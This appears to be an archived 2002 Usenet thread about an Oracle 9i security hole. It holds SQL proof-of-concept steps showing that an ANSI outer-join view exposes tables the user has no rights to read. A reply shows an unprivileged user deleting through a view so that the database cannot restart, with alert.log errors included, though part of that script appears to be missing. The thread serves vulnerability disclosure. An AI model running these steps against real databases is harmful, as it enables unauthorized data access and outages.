| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
 |
 | |||
| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
|
| |||
Home -> Community -> Usenet -> c.d.o.server -> Re: 9iDB Security Hole?
This actually affects 9i on all platforms. Any use of the new ANSI join syntax will
encounter it, but the old join syntax is immune.
Don't try this at home without adult supervision:
SQL> create user fred identified by blah; SQL> grant create session, create view to fred; SQL> connect fred/blah
View created.
SQL> delete from blowup;
Now reconnect as SYS, and do a shutdown followed by a startup, and see what happens.
Here's a clue from my alert.log:
Errors in file C:\oracle\admin\HJR9\udump\ORA01244.TRC:
ORA-00704: bootstrap process failure ORA-00704: bootstrap process failure ORA-00600: internal error code, arguments: [16513], [1403], [50], [], [], [], [], []
Tue Apr 16 16:39:41 2002
Error 704 happened during db open, shutting down database
Regards
HJR
"Vladimir M. Zakharychev" wrote:
> Anyone with 9i can confirm this?
>
> From: news [mailto:news_at_host.talk.ru] On Behalf Of ...
> ...relcom.comp.dbms.oracle
>
> connect system/****@database
> CREATE USER us1 IDENTIFIED BY us11 DEFAULT TABLESPACE users TEMPORARY
> TABLESPACE temp;
> CREATE USER us2 IDENTIFIED BY us12 DEFAULT TABLESPACE users TEMPORARY
> TABLESPACE temp;
> Grant Create Session To us1;
> Grant Create Session To us2;
> Grant Create Table To us1;
> grant unlimited tablespace to us1;
> Grant Create View To us2;
>
> Connect us1/us11_at_database;
> Create Table t1(c1 Number(1));
> Insert Into t1(c1) Values(9);
> Create Table t2(c1 Number(1));
> Insert Into t2(c1) Values(9);
>
> commit;
> Connect us2/us11_at_database;
>
> SQL> Select * From us1.t1;
> ORA-00942: table or view does not exist
> -- this is expected
> SQL> Select * From us1.t2;
> ORA-00942: table or view does not exist
> -- this one too
> SQL> Create View aa As Select * From us1.t1;
> ORA-00942: table or view does not exist
> -- and this one
> SQL> Create View aa As Select t1.c1 As t1_c1, t2.c1 As t2_c1
> >From us1.t1 Left Outer Join us1.t2 On t1.c1 = t2.c1;
>
> View created
> -- now this one is NOT !!!!!
> SQL> select * from aa;
>
> T1_C1 T2_C1
> ---- ----
> 9 9
>
> This effectively means that LEFT OUTER JOIN allows to create views
> on tables that are normally not visible (provided that unprivileged user
> knows table and column names).
> If you can confirm this basic example, can you also try it on system
> catalog tables/views? If you can not confirm, please specify your version
> and platform so that we know which ones are not affected (poster didn't
> specify version, but I suggest it's 9.0.1.1 on either NT or Linux).
>
> --
> Vladimir Zakharychev (bob@dpsp-yes.com) http://www.dpsp-yes.com
> Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet applications.
> All opinions are mine and do not necessarily go in line with those of my employer.
 |
 |